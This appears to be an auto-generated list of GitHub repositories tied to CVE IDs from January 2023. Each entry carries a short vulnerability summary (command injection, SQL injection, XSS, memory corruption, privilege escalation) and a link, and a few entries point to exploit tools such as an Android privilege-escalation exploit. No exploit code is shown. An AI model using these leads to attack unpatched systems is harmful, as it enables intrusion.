**A command injection vulnerability in the CGI program of Zyxel NR7101 firmware prior to V1.15(ACCC.3)C0, which could allow an authenticated attacker to execute some OS commands on a vulnerable device by sending a crafted HTTP request. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43390](https://github.com/Live-Hack-CVE/CVE-2022-43390) create time: 2023-01-11T06:52:34Z

**nhttpd in Nostromo before 2.1 is vulnerable to a path traversal that may allow an attacker to execute arbitrary commands on the remote server. The vulnerability occurs when the homedirs option is used. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48253](https://github.com/Live-Hack-CVE/CVE-2022-48253) create time: 2023-01-11T06:52:26Z

**Multiple vulnerabilities in the web-based management interface of Aruba EdgeConnect Enterprise Orchestrator could allow an authenticated remote attacker to conduct SQL injection attacks against the Aruba EdgeConnect Enterprise Orchestrator instance. An attacker could exploit these vulnerabilities to obtain and modify s CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43519](https://github.com/Live-Hack-CVE/CVE-2022-43519) create time: 2023-01-11T06:52:19Z

**Multiple vulnerabilities within the web-based management interface of Aruba EdgeConnect Enterprise Orchestrator could allow a remote attacker to conduct a reflected cross-site scripting (XSS) attack against a user of the interface. A successful exploit could allow an attacker to execute arbitrary script code in a victi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43526](https://github.com/Live-Hack-CVE/CVE-2022-43526) create time: 2023-01-11T06:52:15Z

**Multiple vulnerabilities within the web-based management interface of Aruba EdgeConnect Enterprise Orchestrator could allow a remote attacker to conduct a reflected cross-site scripting (XSS) attack against a user of the interface. A successful exploit could allow an attacker to execute arbitrary script code in a victi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43525](https://github.com/Live-Hack-CVE/CVE-2022-43525) create time: 2023-01-11T06:52:10Z

**A vulnerability in the web-based management interface of Aruba EdgeConnect Enterprise Orchestrator could allow an authenticated remote attacker to conduct a stored cross-site scripting (XSS) attack against an administrative user of the interface. A successful exploit allows an attacker to execute arbitrary script code CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43524](https://github.com/Live-Hack-CVE/CVE-2022-43524) create time: 2023-01-11T06:52:06Z

**There is no check to see if slot 0 is being uploaded from the device to the host. When using encrypted images this means the unencrypted firmware can be retrieved easily. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-0553](https://github.com/Live-Hack-CVE/CVE-2022-0553) create time: 2023-01-11T06:51:57Z

**The Syracom Secure Login plugin before 3.1.1.0 for Jira may allow spoofing of 2FA PIN validation via the plugins/servlet/twofactor/public/pinvalidation target parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22958](https://github.com/Live-Hack-CVE/CVE-2023-22958) create time: 2023-01-11T06:52:29Z

**WebChess through 0.9.0 and 1.0.0.rc2 allows SQL injection: mainmenu.php, chess.php, and opponentspassword.php (txtFirstName, txtLastName). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22959](https://github.com/Live-Hack-CVE/CVE-2023-22959) create time: 2023-01-11T06:52:02Z

**cve-2010-1622 Learning Environment** : [E-bounce/cve-2010-1622_learning_environment](https://github.com/E-bounce/cve-2010-1622_learning_environment) create time: 2023-01-11T03:37:56Z

**A use-after-free vulnerability was found in __nfs42_ssc_open() in fs/nfs/nfs4file.c in the Linux kernel. This flaw allows an attacker to conduct a remote denial CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4379](https://github.com/Live-Hack-CVE/CVE-2022-4379) create time: 2023-01-11T00:10:08Z

**An integer underflow in Organization Specific TLV was found in various versions of OpenvSwitch. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4338](https://github.com/Live-Hack-CVE/CVE-2022-4338) create time: 2023-01-11T00:10:03Z

**A use-after-free flaw caused by a race among the superblock operations in the gadgetfs Linux driver was found. It could be triggered by yanking out a device that is running the gadgetfs side. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4382](https://github.com/Live-Hack-CVE/CVE-2022-4382) create time: 2023-01-11T00:09:59Z

**An issue in MPD (Music Player Daemon) v0.23.10 allows attackers to cause a Denial of Service (DoS) via a crafted input. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46449](https://github.com/Live-Hack-CVE/CVE-2022-46449) create time: 2023-01-11T00:09:56Z

**An out-of-bounds read in Organization Specific TLV was found in various versions of OpenvSwitch. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4337](https://github.com/Live-Hack-CVE/CVE-2022-4337) create time: 2023-01-11T00:09:38Z

**Windows Cryptographic Information Disclosure Vulnerability. This CVE ID is unique from CVE-2023-21550, CVE-2023-21559. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21540](https://github.com/Live-Hack-CVE/CVE-2023-21540) create time: 2023-01-11T00:11:14Z

**Microsoft Message Queuing (MSMQ) Elevation of Privilege Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21537](https://github.com/Live-Hack-CVE/CVE-2023-21537) create time: 2023-01-11T00:11:09Z

**Windows Print Spooler Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2023-21678, CVE-2023-21760. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21765](https://github.com/Live-Hack-CVE/CVE-2023-21765) create time: 2023-01-11T00:11:05Z

**Windows Authentication Remote Code Execution Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21539](https://github.com/Live-Hack-CVE/CVE-2023-21539) create time: 2023-01-11T00:11:00Z

**Microsoft Exchange Server Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2023-21763. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21764](https://github.com/Live-Hack-CVE/CVE-2023-21764) create time: 2023-01-11T00:10:57Z

**Windows Task Scheduler Elevation of Privilege Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21541](https://github.com/Live-Hack-CVE/CVE-2023-21541) create time: 2023-01-11T00:10:52Z

**Windows Secure Socket Tunneling Protocol (SSTP) Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2023-21548. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21535](https://github.com/Live-Hack-CVE/CVE-2023-21535) create time: 2023-01-11T00:10:48Z

**Event Tracing for Windows Information Disclosure Vulnerability. This CVE ID is unique from CVE-2023-21753. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21536](https://github.com/Live-Hack-CVE/CVE-2023-21536) create time: 2023-01-11T00:10:42Z

**Windows iSCSI Service Denial of Service Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21527](https://github.com/Live-Hack-CVE/CVE-2023-21527) create time: 2023-01-11T00:10:38Z

**Azure Service Fabric Container Elevation of Privilege Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21531](https://github.com/Live-Hack-CVE/CVE-2023-21531) create time: 2023-01-11T00:10:34Z

**Windows Kernel Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2023-21675, CVE-2023-21747, CVE-2023-21748, CVE-2023-21749, CVE-2023-21750, CVE-2023-21754, CVE-2023-21772, CVE-2023-21773, CVE-2023-21774. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21755](https://github.com/Live-Hack-CVE/CVE-2023-21755) create time: 2023-01-11T00:10:30Z

**Windows Local Security Authority (LSA) Elevation of Privilege Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21524](https://github.com/Live-Hack-CVE/CVE-2023-21524) create time: 2023-01-11T00:10:26Z

**Windows GDI Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2023-21552. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21532](https://github.com/Live-Hack-CVE/CVE-2023-21532) create time: 2023-01-11T00:10:22Z

**Remote Procedure Call Runtime Denial of Service Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21525](https://github.com/Live-Hack-CVE/CVE-2023-21525) create time: 2023-01-11T00:10:17Z

**Windows Backup Service Elevation of Privilege Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21752](https://github.com/Live-Hack-CVE/CVE-2023-21752) create time: 2023-01-11T00:10:13Z

**Windows Credential Manager User Interface Elevation of Privilege Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21726](https://github.com/Live-Hack-CVE/CVE-2023-21726) create time: 2023-01-11T00:09:51Z

**Windows Secure Socket Tunneling Protocol (SSTP) Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2023-21535. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21548](https://github.com/Live-Hack-CVE/CVE-2023-21548) create time: 2023-01-11T00:09:46Z

**.NET Denial of Service Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21538](https://github.com/Live-Hack-CVE/CVE-2023-21538) create time: 2023-01-11T00:09:42Z

**Black Box KVM Firmware version 3.4.31307 on models ACR1000A-R-R2, ACR1000A-T-R2, ACR1002A-T, ACR1002A-R, and ACR1020A-T is vulnerable to path traversal, which may allow an attacker to steal user credentials and other sensitive information through local file inclusion. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4636](https://github.com/Live-Hack-CVE/CVE-2022-4636) create time: 2023-01-10T21:58:34Z

**An issue in the /index.php/user/edit_user/ component of Book Store Management System v1.0 allows unauthenticated attackers to retrieve the password hashes of all existing user accounts via a crafted request. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45614](https://github.com/Live-Hack-CVE/CVE-2022-45614) create time: 2023-01-10T21:58:30Z

**Argo Events is an event-driven workflow automation framework for Kubernetes. Prior to version 1.7.1, several `HandleRoute` endpoints make use of the deprecated `ioutil.ReadAll()`. `ioutil.ReadAll()` reads all the data into memory. As such, an attacker who sends a large request to the Argo Events server will be able to CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-31054](https://github.com/Live-Hack-CVE/CVE-2022-31054) create time: 2023-01-10T21:58:19Z

**Insufficient policy enforcement in CORS in Google Chrome prior to 109.0.5414.74 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Low) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0141](https://github.com/Live-Hack-CVE/CVE-2023-0141) create time: 2023-01-10T21:59:35Z

**Inappropriate implementation in in File System API in Google Chrome on Windows prior to 109.0.5414.74 allowed a remote attacker to bypass file system restrictions via a crafted HTML page. (Chromium security severity: Low) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0140](https://github.com/Live-Hack-CVE/CVE-2023-0140) create time: 2023-01-10T21:59:30Z

**Insufficient validation of untrusted input in Downloads in Google Chrome on Windows prior to 109.0.5414.74 allowed a remote attacker to bypass download restrictions via a crafted HTML page. (Chromium security severity: Low) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0139](https://github.com/Live-Hack-CVE/CVE-2023-0139) create time: 2023-01-10T21:59:26Z

**Inappropriate implementation in in Permission prompts in Google Chrome on Windows prior to 109.0.5414.74 allowed a remote attacker to force acceptance of a permission prompt via a crafted HTML page. (Chromium security severity: Medium) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0132](https://github.com/Live-Hack-CVE/CVE-2023-0132) create time: 2023-01-10T21:59:22Z

**Heap buffer overflow in libphonenumber in Google Chrome prior to 109.0.5414.74 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Low) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0138](https://github.com/Live-Hack-CVE/CVE-2023-0138) create time: 2023-01-10T21:59:17Z

**Heap buffer overflow in Network Service in Google Chrome prior to 109.0.5414.74 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via a crafted HTML page and specific interactions. (Chromium security severity: High) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0129](https://github.com/Live-Hack-CVE/CVE-2023-0129) create time: 2023-01-10T21:59:13Z

**Heap buffer overflow in Platform Apps in Google Chrome on Chrome OS prior to 109.0.5414.74 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0137](https://github.com/Live-Hack-CVE/CVE-2023-0137) create time: 2023-01-10T21:59:08Z

**Inappropriate implementation in in Fullscreen API in Google Chrome on Android prior to 109.0.5414.74 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page. (Chromium security severity: Medium) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0130](https://github.com/Live-Hack-CVE/CVE-2023-0130) create time: 2023-01-10T21:59:04Z

**Inappropriate implementation in in Fullscreen API in Google Chrome on Android prior to 109.0.5414.74 allowed a remote attacker to execute incorrect security UI via a crafted HTML page. (Chromium security severity: Medium) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0136](https://github.com/Live-Hack-CVE/CVE-2023-0136) create time: 2023-01-10T21:58:59Z

**Use after free in Overview Mode in Google Chrome on Chrome OS prior to 109.0.5414.74 allowed a remote attacker who convinced a user to engage in specific UI interactions to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0128](https://github.com/Live-Hack-CVE/CVE-2023-0128) create time: 2023-01-10T21:58:55Z

**Use after free in Cart in Google Chrome prior to 109.0.5414.74 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via database corruption and a crafted HTML page. (Chromium security severity: Medium) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0135](https://github.com/Live-Hack-CVE/CVE-2023-0135) create time: 2023-01-10T21:58:52Z

**Use after free in Cart in Google Chrome prior to 109.0.5414.74 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via database corruption and a crafted HTML page. (Chromium security severity: Medium) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0134](https://github.com/Live-Hack-CVE/CVE-2023-0134) create time: 2023-01-10T21:58:47Z

**Inappropriate implementation in in Permission prompts in Google Chrome on Android prior to 109.0.5414.74 allowed a remote attacker to bypass main origin permission delegation via a crafted HTML page. (Chromium security severity: Medium) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0133](https://github.com/Live-Hack-CVE/CVE-2023-0133) create time: 2023-01-10T21:58:43Z

**Inappropriate implementation in in iframe Sandbox in Google Chrome prior to 109.0.5414.74 allowed a remote attacker to bypass file download restrictions via a crafted HTML page. (Chromium security severity: Medium) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0131](https://github.com/Live-Hack-CVE/CVE-2023-0131) create time: 2023-01-10T21:58:38Z

**ISOS firmwares from versions 1.81 to 2.00 contain hardcoded credentials from embedded StreamX installer that integrators are not forced to change. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4780](https://github.com/Live-Hack-CVE/CVE-2022-4780) create time: 2023-01-10T19:49:06Z

**In wlan driver, there is a possible missing bounds check. This could lead to local denial of service in wlan services. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44441](https://github.com/Live-Hack-CVE/CVE-2022-44441) create time: 2023-01-10T19:49:00Z

**In wlan driver, there is a possible missing bounds check, This could lead to local denial of service in wlan services. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44442](https://github.com/Live-Hack-CVE/CVE-2022-44442) create time: 2023-01-10T19:48:52Z

**Improper validation of script alert plugin parameters in Apache DolphinScheduler to avoid remote command execution vulnerability. This issue affects Apache DolphinScheduler version 3.0.1 and prior versions; version 3.1.0 and prior versions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45875](https://github.com/Live-Hack-CVE/CVE-2022-45875) create time: 2023-01-10T19:48:48Z

**In wlan driver, there is a possible missing bounds check. This could lead to local denial of service in wlan services. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44430](https://github.com/Live-Hack-CVE/CVE-2022-44430) create time: 2023-01-10T19:48:43Z

**In wlan driver, there is a possible missing bounds check. This could lead to local denial of service in wlan services. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44431](https://github.com/Live-Hack-CVE/CVE-2022-44431) create time: 2023-01-10T19:48:38Z

**In wlan driver, there is a possible missing bounds check. This could lead to local denial of service in wlan services. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44432](https://github.com/Live-Hack-CVE/CVE-2022-44432) create time: 2023-01-10T19:48:33Z

**The CPO Companion plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several of its content type settings parameters in versions up to, and including, 1.0.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permiss CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0162](https://github.com/Live-Hack-CVE/CVE-2023-0162) create time: 2023-01-10T19:48:17Z

**no description** : [patrickhener/CVE-2023-22855](https://github.com/patrickhener/CVE-2023-22855) create time: 2023-01-10T18:27:40Z

**A vulnerability was found in mapoor voteapp. It has been rated as critical. Affected by this issue is the function create_poll/do_poll/show_poll/show_refresh of the file app.py. The manipulation leads to sql injection. The name of the patch is b290c21a0d8bcdbd55db860afd3cadec97388e72. It is recommended to apply a patch CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125073](https://github.com/Live-Hack-CVE/CVE-2014-125073) create time: 2023-01-10T17:35:12Z

**CVE-2021-29447 - Authenticated XXE Injection - WordPress < 5.7.1 & PHP > 8** : [viardant/CVE-2021-29447](https://github.com/viardant/CVE-2021-29447) create time: 2023-01-10T17:55:19Z

**A double free bug in packet_set_ring() in net/packet/af_packet.c can be exploited by a local user through crafted syscalls to escalate privileges or deny service. We recommend upgrading kernel past the effected versions or rebuilding past ec6af094ea28f0f2dda1a6a33b14cd57e36a9755 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-22600](https://github.com/Live-Hack-CVE/CVE-2021-22600) create time: 2023-01-10T17:35:28Z

**In messaging service, there is a missing permission check. This could lead to local denial of service in contacts service with no additional execution privileges needed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44439](https://github.com/Live-Hack-CVE/CVE-2022-44439) create time: 2023-01-10T17:35:06Z

**In messaging service, there is a missing permission check. This could lead to local denial of service in contacts service with no additional execution privileges needed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44438](https://github.com/Live-Hack-CVE/CVE-2022-44438) create time: 2023-01-10T17:35:02Z

**In messaging service, there is a missing permission check. This could lead to local denial of service in contacts service with no additional execution privileges needed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44437](https://github.com/Live-Hack-CVE/CVE-2022-44437) create time: 2023-01-10T17:34:57Z

**In messaging service, there is a missing permission check. This could lead to local denial of service in contacts service with no additional execution privileges needed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44436](https://github.com/Live-Hack-CVE/CVE-2022-44436) create time: 2023-01-10T17:34:52Z

**In messaging service, there is a missing permission check. This could lead to local denial of service in contacts service with no additional execution privileges needed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44435](https://github.com/Live-Hack-CVE/CVE-2022-44435) create time: 2023-01-10T17:34:48Z

**In messaging service, there is a missing permission check. This could lead to local denial of service in contacts service with no additional execution privileges needed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44434](https://github.com/Live-Hack-CVE/CVE-2022-44434) create time: 2023-01-10T17:34:44Z

**Nortek Linear eMerge E3-Series 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e were discovered to contain a SQL injection vulnerability via the idt parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38627](https://github.com/Live-Hack-CVE/CVE-2022-38627) create time: 2023-01-10T17:34:35Z

**no description** : [lolin19/CVE-2022-21839-](https://github.com/lolin19/CVE-2022-21839-) create time: 2023-01-10T16:34:02Z

**no description** : [lolin19/CVE-2022-21839_](https://github.com/lolin19/CVE-2022-21839_) create time: 2023-01-10T16:28:01Z

**no description** : [lolin19/CVE-2022-21839](https://github.com/lolin19/CVE-2022-21839) create time: 2023-01-10T16:26:38Z

**Exploit for CVE-2022-20452, privilege escalation on Android from installed app to system app (or another app) via LazyValue using Parcel after recycle()** : [michalbednarski/LeakValue](https://github.com/michalbednarski/LeakValue) create time: 2023-01-10T16:24:51Z

**Emby Server before 4.5.0 allows SSRF via the Items/RemoteSearch/Image ImageURL parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-26948](https://github.com/Live-Hack-CVE/CVE-2020-26948) create time: 2023-01-10T15:23:54Z

**Certain NETGEAR devices are affected by a buffer overflow by an unauthenticated attacker. This affects RAX40 before 1.0.2.60, RAX35 before 1.0.2.60, R6400v2 before 1.0.4.122, R6700v3 before 1.0.4.122, R6900P before 1.3.3.152, R7000P before 1.3.3.152, R7000 before 1.0.11.136, R7960P before 1.4.4.94, and R8000P before 1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48196](https://github.com/Live-Hack-CVE/CVE-2022-48196) create time: 2023-01-10T15:23:50Z

**72crm v9 was discovered to contain an arbitrary file upload vulnerability via the avatar upload function. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46610](https://github.com/Live-Hack-CVE/CVE-2022-46610) create time: 2023-01-10T15:23:44Z

**This issue affects: Terminal Operating System versions before 5.0.13 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3792](https://github.com/Live-Hack-CVE/CVE-2022-3792) create time: 2023-01-10T15:23:37Z

**A vulnerability has been identified in JT Open (All versions < V11.1.1.0), JT Utilities (All versions < V13.1.1.0), Solid Edge (All versions < V2023). The Jt1001.dll contains a use-after-free vulnerability that could be triggered while parsing specially crafted JT files. An attacker could leverage this vulnerability to CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44014](https://github.com/Live-Hack-CVE/CVE-2021-44014) create time: 2023-01-10T14:18:11Z

**A vulnerability has been identified in JT Open (All versions < V11.1.1.0), JT Utilities (All versions < V13.1.1.0), Solid Edge (All versions < V2023). The Jt1001.dll contains an out of bounds write past the end of an allocated structure while parsing specially crafted JT files. This could allow an attacker to execute c CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44002](https://github.com/Live-Hack-CVE/CVE-2021-44002) create time: 2023-01-10T14:18:06Z

**A vulnerability has been identified in Solid Edge (All versions < V2023 MP1). The DOCMGMT.DLL contains a memory corruption vulnerability that could be triggered while parsing files in different file formats such as PAR, ASM, DFT. This could allow an attacker to execute code in the context of the current process. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47967](https://github.com/Live-Hack-CVE/CVE-2022-47967) create time: 2023-01-10T14:17:48Z

**A vulnerability has been identified in JT Open (All versions < V11.1.1.0), JT Utilities (All versions < V13.1.1.0), Solid Edge (All versions < V2023). The Jt1001.dll contains a memory corruption vulnerability while parsing specially crafted JT files. An attacker could leverage this vulnerability to execute code in the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47935](https://github.com/Live-Hack-CVE/CVE-2022-47935) create time: 2023-01-10T14:17:43Z

**A vulnerability has been identified in Mendix SAML (Mendix 8 compatible) (All versions >= V2.3.0 < V2.3.4), Mendix SAML (Mendix 9 compatible, New Track) (All versions >= V3.3.0 < V3.3.9), Mendix SAML (Mendix 9 compatible, Upgrade Track) (All versions >= V3.3.0 < V3.3.8). The affected module is vulnerable to reflected c CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46823](https://github.com/Live-Hack-CVE/CVE-2022-46823) create time: 2023-01-10T14:17:39Z

**A vulnerability has been identified in SINEC INS (All versions < V1.0 SP2 Update 1). An authenticated remote attacker with access to the Web Based Management (443/tcp) of the affected product, could potentially inject commands into the dhcpd configuration of the affected product. An attacker might leverage this to trig CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45094](https://github.com/Live-Hack-CVE/CVE-2022-45094) create time: 2023-01-10T14:17:34Z

**A vulnerability has been identified in SINEC INS (All versions < V1.0 SP2 Update 1). An authenticated remote attacker with access to the Web Based Management (443/tcp) of the affected product as well as with access to the SFTP server of the affected product (22/tcp), could potentially read and write arbitrary files fro CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45093](https://github.com/Live-Hack-CVE/CVE-2022-45093) create time: 2023-01-10T14:17:29Z

**A vulnerability has been identified in SINEC INS (All versions < V1.0 SP2 Update 1). An authenticated remote attacker with access to the Web Based Management (443/tcp) of the affected product, could potentially read and write arbitrary files from and to the device's file system. An attacker might leverage this to trigg CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45092](https://github.com/Live-Hack-CVE/CVE-2022-45092) create time: 2023-01-10T14:17:25Z

**A vulnerability has been identified in Automation License Manager V5 (All versions), Automation License Manager V6 (All versions < V6.0 SP9 Upd4). The affected component does not correctly validate the root path on folder related operations, allowing to modify files and folders outside the intended root directory. This CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43514](https://github.com/Live-Hack-CVE/CVE-2022-43514) create time: 2023-01-10T14:17:20Z

**A vulnerability has been identified in Automation License Manager V5 (All versions), Automation License Manager V6 (All versions < V6.0 SP9 Upd4). The affected components allow to rename license files with user chosen input without authentication. This could allow an unauthenticated remote attacker to rename and move f CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43513](https://github.com/Live-Hack-CVE/CVE-2022-43513) create time: 2023-01-10T14:17:15Z

**Affected devices do not contain an Immutable Root of Trust in Hardware. With this the integrity of the code executed on the device can not be validated during load-time. An attacker with physical access to the device could use this to replace the boot image of the device and execute arbitrary code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38773](https://github.com/Live-Hack-CVE/CVE-2022-38773) create time: 2023-01-10T14:17:10Z

**Ecto 2.2.0 lacks a certain protection mechanism associated with the interaction between is_nil and raise. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-20166](https://github.com/Live-Hack-CVE/CVE-2017-20166) create time: 2023-01-10T12:06:46Z

**tag.ex in Phoenix Phoenix.HTML (aka phoenix_html) before 3.0.4 allows XSS in HEEx class attributes. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-46871](https://github.com/Live-Hack-CVE/CVE-2021-46871) create time: 2023-01-10T12:06:50Z

**** DISPUTED ** The AES instructions on the ARMv8 platform do not have an algorithm that is "intrinsically resistant" to side-channel attacks. NOTE: the vendor reportedly offers the position "while power side channel attacks ... are possible, they are not directly caused by or related to the Arm architecture." CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48251](https://github.com/Live-Hack-CVE/CVE-2022-48251) create time: 2023-01-10T12:06:41Z

**Avira Security for Windows contains an unquoted service path which allows attackers with local administrative privileges to cause a Denial of Service. The issue was fixed with Avira Security version 1.1.78 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4429](https://github.com/Live-Hack-CVE/CVE-2022-4429) create time: 2023-01-10T12:06:27Z

**Norton, Avira, Avast and AVG Antivirus for Windows may be susceptible to a Privilege Escalation vulnerability, which is a type of issue whereby an attacker may attempt to compromise the software application to gain elevated access to resources that are normally protected from an application or user. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4294](https://github.com/Live-Hack-CVE/CVE-2022-4294) create time: 2023-01-10T12:06:22Z

**api/views/user.py in LibrePhotos before e19e539 has incorrect access control. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22903](https://github.com/Live-Hack-CVE/CVE-2023-22903) create time: 2023-01-10T12:06:55Z

**An issue was discovered in MediaWiki before 1.35.9, 1.36.x through 1.38.x before 1.38.5, and 1.39.x before 1.39.1. E-Widgets does widget replacement in HTML attributes, which can lead to XSS, because widget authors often do not expect that their widget is executed in an HTML attribute context. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22911](https://github.com/Live-Hack-CVE/CVE-2023-22911) create time: 2023-01-10T12:06:37Z

**An issue was discovered in MediaWiki before 1.35.9, 1.36.x through 1.38.x before 1.38.5, and 1.39.x before 1.39.1. SpecialMobileHistory allows remote attackers to cause a denial of service because database queries are slow. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22909](https://github.com/Live-Hack-CVE/CVE-2023-22909) create time: 2023-01-10T12:06:32Z

**Sunflower CVE-2022-10270 vulnerability exploitation tool** : [baimaobg/sunflower_exp](https://github.com/baimaobg/sunflower_exp) create time: 2023-01-10T08:56:15Z

**In Wi-Fi driver, there is a possible undefined behavior due to incorrect error handling. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: GN20220705042; Issue ID: GN20220705042. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32657](https://github.com/Live-Hack-CVE/CVE-2022-32657) create time: 2023-01-10T06:37:10Z

**In Wi-Fi driver, there is a possible undefined behavior due to incorrect error handling. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: GN20220705059; Issue ID: GN20220705059. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32658](https://github.com/Live-Hack-CVE/CVE-2022-32658) create time: 2023-01-10T06:37:05Z

